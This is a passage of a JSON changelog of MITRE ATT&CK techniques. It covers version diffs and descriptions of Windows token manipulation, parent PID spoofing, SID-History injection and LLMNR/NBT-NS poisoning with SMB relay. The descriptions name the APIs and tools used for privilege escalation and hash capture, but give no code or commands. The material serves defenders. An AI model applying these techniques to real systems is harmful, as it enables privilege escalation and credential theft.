                    "modified": "2026-04-15 19:55:37.484000+00:00",
                    "name": "Create Process with Token",
                    "description": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)\n\nCreating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.\n\nWhile this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1134/002",
                            "external_id": "T1134.002"
                        },
                        {
                            "source_name": "Microsoft RunAs",
                            "description": "Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.",
                            "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jonny Johnson",
                        "Vadim Khrykov"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:55:37.484000+00:00\", \"old_value\": \"2025-10-24 17:48:53.370000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Microsoft Command-line Logging\", \"description\": \"Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.\", \"url\": \"https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0456: Behavior-chain detection for T1134.002 Create Process with Token (Windows)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-18 18:03:37.481000+00:00",
                    "modified": "2026-04-15 19:56:16.233000+00:00",
                    "name": "Make and Impersonate Token",
                    "description": "Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.\n\nThis behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1134/003",
                            "external_id": "T1134.003"
                        },
                        {
                            "source_name": "LogonUserW function",
                            "description": "Microsoft. (2023, March 10). LogonUserW function (winbase.h). Retrieved January 8, 2024.",
                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jonny Johnson"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:56:16.233000+00:00\", \"old_value\": \"2025-10-24 17:49:05.200000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Microsoft Command-line Logging\", \"description\": \"Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.\", \"url\": \"https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0498: Behavior\u2011chain detection for T1134.003 Make and Impersonate Token (Windows)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-18 18:22:41.448000+00:00",
                    "modified": "2026-04-15 19:54:42.976000+00:00",
                    "name": "Parent PID Spoofing",
                    "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1134/004",
                            "external_id": "T1134.004"
                        },
                        {
                            "source_name": "XPNSec PPID Nov 2017",
                            "description": "Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.",
                            "url": "https://blog.xpnsec.com/becoming-system/"
                        },
                        {
                            "source_name": "CounterCept PPID Spoofing Dec 2018",
                            "description": "Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.",
                            "url": "https://web.archive.org/web/20200726110643/https://blog.f-secure.com/detecting-parent-pid-spoofing/"
                        },
                        {
                            "source_name": "Microsoft UAC Nov 2018",
                            "description": "Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.",
                            "url": "https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works"
                        },
                        {
                            "source_name": "DidierStevens SelectMyParent Nov 2009",
                            "description": "Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.",
                            "url": "https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/"
                        },
                        {
                            "source_name": "CTD PPID Spoofing Macro Mar 2019",
                            "description": "Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.",
                            "url": "https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Wayne Silva, F-Secure Countercept"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:54:42.976000+00:00\", \"old_value\": \"2025-10-24 17:49:06.759000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://web.archive.org/web/20200726110643/https://blog.f-secure.com/detecting-parent-pid-spoofing/\", \"old_value\": \"https://www.countercept.com/blog/detecting-parent-pid-spoofing/\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['external_references'][4]\": {\"source_name\": \"Microsoft Process Creation Flags May 2018\", \"description\": \"Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.\", \"url\": \"https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags\"}, \"root['external_references'][5]\": {\"source_name\": \"Secuirtyinbits Ataware3 May 2019\", \"description\": \"Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.\", \"url\": \"https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0489: Behavior-chain detection for T1134.004 Access Token Manipulation: Parent PID Spoofing (Windows)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-18 18:34:49.414000+00:00",
                    "modified": "2026-04-15 19:55:14.114000+00:00",
                    "name": "SID-History Injection",
                    "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1134/005",
                            "external_id": "T1134.005"
                        },
                        {
                            "source_name": "Microsoft Well Known SIDs Jun 2017",
                            "description": "Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.",
                            "url": "https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems"
                        },
                        {
                            "source_name": "Microsoft SID-History Attribute",
                            "description": "Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.",
                            "url": "https://msdn.microsoft.com/library/ms679833.aspx"
                        },
                        {
                            "source_name": "Microsoft SID",
                            "description": "Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Alain Homewood, Insomnia Security",
                        "Vincent Le Toux"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:55:14.114000+00:00\", \"old_value\": \"2025-10-24 17:49:16.316000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['external_references'][4]\": {\"source_name\": \"Microsoft Get-ADUser\", \"description\": \"Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.\", \"url\": \"https://technet.microsoft.com/library/ee617241.aspx\"}, \"root['external_references'][5]\": {\"source_name\": \"AdSecurity SID History Sept 2015\", \"description\": \"Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.\", \"url\": \"https://adsecurity.org/?p=1772\"}, \"root['external_references'][6]\": {\"source_name\": \"Microsoft DsAddSidHistory\", \"description\": \"Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November 30, 2017.\", \"url\": \"https://msdn.microsoft.com/library/ms677982.aspx\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1015: Active Directory Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0136: Behavior-chain detection for T1134.005 Access Token Manipulation: SID-History Injection (Windows)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-18 16:39:06.289000+00:00",
                    "modified": "2026-04-15 19:54:20.663000+00:00",
                    "name": "Token Impersonation/Theft",
                    "description": "Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.\n\nAn adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.\n\nWhen an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1134/001",
                            "external_id": "T1134.001"
                        },
                        {
                            "source_name": "DuplicateToken function",
                            "description": "Microsoft. (2021, October 12). DuplicateToken function (securitybaseapi.h). Retrieved January 8, 2024.",
                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetoken"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jonny Johnson"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:54:20.663000+00:00\", \"old_value\": \"2025-10-24 17:49:04.117000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Microsoft Command-line Logging\", \"description\": \"Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.\", \"url\": \"https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0482: Behavior-chain detection for T1134.001 Access Token Manipulation: Token Impersonation/Theft on Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-11 19:08:51.677000+00:00",
                    "modified": "2026-02-03 16:53:09.295000+00:00",
                    "name": "Name Resolution Poisoning and SMB Relay",
                    "description": "By responding to LLMNR/NBT-NS/mDNS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system.(Citation: BlackCat ransomware) This activity may be used to collect or relay authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name.(Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)\n\nMulticast Domain Name System(mDNS) is a zero-configuration service used to resolve hostnames to IP addresses with \u201c.local\u201d as a top-level domain. MDNS is based upon Domain Name System (DNS) format and allows hosts on the same network segment to perform name resolution for other hosts, using multicast.(Citation: mDNS RFC)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137)/mDNS (UDP 5353) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.\n\nIn some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various other protocols, such as LDAP, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.\u00a0\n\nSeveral tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "collection"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1557/001",
                            "external_id": "T1557.001"
                        },
                        {
                            "source_name": "Rapid7 LLMNR Spoofer",
                            "description": "Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.",
                            "url": "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response"
                        },
                        {
                            "source_name": "GitHub Responder",
                            "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.",
                            "url": "https://github.com/SpiderLabs/Responder"
                        },
                        {
                            "source_name": "Secure Ideas SMB Relay",
                            "description": "Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.",
                            "url": "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html"
                        },
                        {
                            "source_name": "BlackCat ransomware",
                            "description": "Lucas Silva, Leandro Froes. (2022, April 18). An Investigation of the BlackCat Ransomware via Trend Micro Vision One. Retrieved February 2, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html"
                        },
                        {
                            "source_name": "TechNet NetBIOS",
                            "description": "Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.",
                            "url": "https://technet.microsoft.com/library/cc958811.aspx"
                        },
                        {
                            "source_name": "GitHub NBNSpoof",
                            "description": "Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.",
                            "url": "https://github.com/nomex/nbnspoof"
                        },
                        {
                            "source_name": "mDNS RFC",
                            "description": "S. Cheshire, M. Krochmal. (2013, February). Multicast DNS. Retrieved February 2, 2026.",
                            "url": "https://datatracker.ietf.org/doc/html/rfc6762"
                        },
                        {
                            "source_name": "byt3bl33d3r NTLM Relaying",
                            "description": "Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.",
                            "url": "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html"
                        },
                        {
                            "source_name": "Wikipedia LLMNR",
                            "description": "Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.",
                            "url": "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Eric Kuehn, Secure Ideas",
                        "Matthew Demaske, Adaptforward",
                        "Andrew Allen, @whitehat_zero",
                        "Arad Inbar"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-03 16:53:09.295000+00:00\", \"old_value\": \"2025-10-24 17:48:52.462000+00:00\"}, \"root['name']\": {\"new_value\": \"Name Resolution Poisoning and SMB Relay\", \"old_value\": \"LLMNR/NBT-NS Poisoning and SMB Relay\"}, \"root['description']\": {\"new_value\": \"By responding to LLMNR/NBT-NS/mDNS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system.(Citation: BlackCat ransomware) This activity may be used to collect or relay authentication materials. \\n\\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name.(Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)\\n\\nMulticast Domain Name System(mDNS) is a zero-configuration service used to resolve hostnames to IP addresses with \\u201c.local\\u201d as a top-level domain. MDNS is based upon Domain Name System (DNS) format and allows hosts on the same network segment to perform name resolution for other hosts, using multicast.(Citation: mDNS RFC)\\n\\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137)/mDNS (UDP 5353) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.\\n\\nIn some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various other protocols, such as LDAP, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.\\u00a0\\n\\nSeveral tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)\", \"old_value\": \"By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. 